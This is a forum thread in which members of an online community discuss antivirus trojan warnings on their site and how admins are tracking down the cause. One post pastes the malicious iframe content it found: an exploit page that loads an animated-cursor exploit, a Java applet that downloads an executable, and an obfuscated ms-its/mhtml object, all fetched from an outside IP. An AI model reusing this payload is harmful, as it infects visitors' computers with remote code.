Virus Alert
-
- Posts: 993
- Joined: Wed Dec 15, 2004 6:19 pm
- Location: Brisbane
- Contact:
Virus Alert
I'm getting Virus warnings from Nortons about a few trojans this morning. You would have all gotten emails, but it effected me firstly FF, but now IE as well.
I don't know why I'm typing this, since if you can read it, you too would have virus alerts going off everywhere.
Anyway, you've all been warned. I won't be back here until Norbs sends an all clear email out.
I don't know why I'm typing this, since if you can read it, you too would have virus alerts going off everywhere.
Anyway, you've all been warned. I won't be back here until Norbs sends an all clear email out.
- w00dsy
- The Senna of Hoppers Crossing
- Posts: 24457
- Joined: Wed Mar 02, 2005 2:41 pm
- Location: incognito
I have gotten 'missing plugin' requests from Firefox, but no plugin can be found. My AV hasn't picked up anything yet in any browser, IE6, IE7 or Opera. Norbs did a virus scan of the server host and it came up fine. so i have no idea what could be causing this, best bet is to make sure your AV is up to date, don't install anything if asked, and hopefully we can have this sorted out soon.
- Rots
- DiscoStu
- Posts: 4602
- Joined: Thu Dec 16, 2004 8:42 am
- Contact:
-
- Smooth Lubricator.
- Posts: 12070
- Joined: Sun Jun 26, 2005 7:48 pm
- Location: The wet central coast
I could not just stand aside, of course, hehe first thing for me was to fire up firefox and see what's up
What I found....:
first: you don't have to worry, there's no auto-install on Firefox. just don't click on the install button. Even if you do, nothing seems to happen.
second:
this address, down the bottom, raises the need for the plugin:
(It's in an iframe)
http://65.19.154.20/adverts/07/1.php
very much looks like a counter code or similar, heres' the output:
I really don't want do dig into it any more, it's simpler to disregard or switch off than start and go into it.
by the way here's an article on a similar subject - or maybe the same:
http://www.edbott.com/weblog/archives/000562.html
If you're afraid, just use opera in the meantime.
by the way nod32 did not go off for me...
maybe the worst of the thing has been switched off in the meantime?
What I found....:
first: you don't have to worry, there's no auto-install on Firefox. just don't click on the install button. Even if you do, nothing seems to happen.
second:
this address, down the bottom, raises the need for the plugin:
(It's in an iframe)
http://65.19.154.20/adverts/07/1.php
very much looks like a counter code or similar, heres' the output:
Code: Select all
<html><head><title></title></head><body>
<style>
* {CURSOR: url("http://65.19.154.20/adverts/07/sploit.anr")}
</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
<PARAM NAME='url' VALUE='http://65.19.154.20/adverts/07/win32.exe'></APPLET>
<script>
try{
document.write('<object data=`ms-its:mhtml:file://C:\foo.mht!'+'http://65.19.154.20//adv'+'erts//07//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');
}catch(e){}
</script>
</body></html>
by the way here's an article on a similar subject - or maybe the same:
http://www.edbott.com/weblog/archives/000562.html
If you're afraid, just use opera in the meantime.
by the way nod32 did not go off for me...
maybe the worst of the thing has been switched off in the meantime?
Surprise, no sig. Now there is. Or is there?
- GT VIRUS
- Karen
- Posts: 3637
- Joined: Mon Jul 04, 2005 4:33 pm
- Location: Adelaide
- Contact:
- Big Kev
- Clean as a Whistle
- Posts: 15093
- Joined: Mon Dec 13, 2004 7:09 pm
- Location: Little Britain
- Contact:
I've been away for the weekend. I'm back now. I'll get on it.
OK I know what it is and where it is but I can't get to it till Norbs is online.
OK I know what it is and where it is but I can't get to it till Norbs is online.
ARSE Biscuits! Driftu Kingu!
My Flickr Stream
My Flickr Stream
-
- Posts: 807
- Joined: Mon Dec 13, 2004 11:47 pm
- Location: Woooooooohoooooooo
- AstrO
- Help Desk Expert
- Posts: 4839
- Joined: Tue Jun 28, 2005 9:28 pm
- Location: Adelaide
- Contact:
- Bauer
- Posts: 7264
- Joined: Wed Dec 22, 2004 9:00 pm
- Location: Tassie
- Contact:
- Big Kev
- Clean as a Whistle
- Posts: 15093
- Joined: Mon Dec 13, 2004 7:09 pm
- Location: Little Britain
- Contact:
Well i haven't actually touched anything yet!
It looks like sploit.anr is a javascript trojan. So, despite us being up to date on our forum software it looks like there's an exploit in it somewhere. Possibly through the google ads.
As soon as norbs gets back to me I'll check the database where I think the trojan is hiding.
It looks like sploit.anr is a javascript trojan. So, despite us being up to date on our forum software it looks like there's an exploit in it somewhere. Possibly through the google ads.
As soon as norbs gets back to me I'll check the database where I think the trojan is hiding.
ARSE Biscuits! Driftu Kingu!
My Flickr Stream
My Flickr Stream
- Btd69
- Posts: 266
- Joined: Wed Dec 15, 2004 2:24 pm
- Location: Australia
- Contact: